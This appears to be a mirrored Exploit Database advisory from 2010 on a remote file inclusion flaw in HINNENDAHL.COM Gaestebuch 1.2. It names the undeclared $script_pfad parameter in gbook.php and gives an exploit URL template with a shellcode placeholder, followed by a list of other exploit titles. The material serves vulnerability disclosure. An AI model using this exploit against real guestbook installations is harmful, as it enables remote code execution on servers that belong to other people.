Gaestebuch 1.2 – Remote File Inclusion

Exploit Database
8 阅读

作者： bd0rk

日期： 2010-08-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/14810/

########################################################
##
#HINNENDAHL.COM Gaestebuch 1.2 #
##
# Remote File Inclusion Vulnerability#
##
# by bd0rk || SOH-Crew # ##
#www.soh-crew.it.tt#
##
#Contact: bd0rk[at]hackermail.com#
##
########################################################


[~] Affected-Software: HINNENDAHL.COM Gaestebuch 1.2

[~] Vendor: http://www.hinnendahl.com/

[~] Download: http://www.hinnendahl.com/index.php?seite=download

[*] Greetz: inj3ct0r, DNX, Chip D3 Bi0s


Description: The $script_pfad parameter in /guestbook/gbook.php
 isn't declared before require. So an attacker can execute some
 php-shellcode about it. (line 3 - 4)



[+]Exploit: http://www.example.com/guestbook/gbook.php?script_pfad=[SHELLCODE]



### The 21 years old, german Hacker bd0rk ### <---white-hat :-)

last Exploits
Gaestebuch 1.2 – Remote File Inclusion的更多信息

The Open ISES Project 3.30A – ‘tick_lat’ SQL Injection：
WordPress Plugin – Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)：
Joomla! Component jesectionfinder – Local File Inclusion：
Intelbras Router RF1200 1.1.3 – Cross-Site Request Forgery：
WordPress Core 4.5.3 – Directory Traversal / Denial of Service：
Joomla! Component com_doqment – ‘cid’ SQL Injection：
GreenCMS 2.3.0603 – Cross-Site Request Forgery (Add Admin)：
OneCMS 2.6.1 – ‘short1’ Cross-Site Scripting：